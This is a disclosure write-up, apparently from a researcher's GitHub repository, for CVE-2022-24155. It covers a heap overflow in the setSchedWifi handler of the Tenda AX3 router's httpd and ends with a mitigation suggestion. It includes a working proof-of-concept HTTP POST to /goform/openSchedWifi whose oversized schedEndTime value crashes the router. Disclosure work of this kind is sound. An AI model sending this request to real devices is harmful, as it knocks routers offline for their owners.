CVE-2022-24155: my_vuln/25.md at main · pjqwudi/my_vuln

Tenda Vulnerability

Vendor:Tenda

Product:AX3

Version:V16.03.12.10_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Heap Overflow

Author:Jiaqian Peng

Institution:[email protected]

Vulnerability description

We found an heap overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

Heap Overflow

In httpd binary:

In setSchedWifi function, schedStartTime、schedEndTime is directly passed by the attacker, If this part of the data is too long, it will cause the heap overflow, so we can control the schedStartTime、schedEndTime to crash the program.

As you can see here, the input has not been checked. In setSchedWifi function, the parameter schedStartTime、schedEndTime is directly copy to a local variable placed on the heap, which overflow the heap and crash the program.

Supplement

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

PoC

We set schedEndTime as aaaaaaaaaaaaaaaaaaa… , and the router will crash, such as:

POST /goform/openSchedWifi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 175 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/wifi_time.html?random=0.42441434754681306& Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0johcvb

schedWifiEnable=1&schedStartTime=00%3A00&schedEndTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&timeType=1&day=1%2C1%2C1%2C1%2C1%2C0%2C0

Result

The target router crashes and cannot provide services correctly and persistently.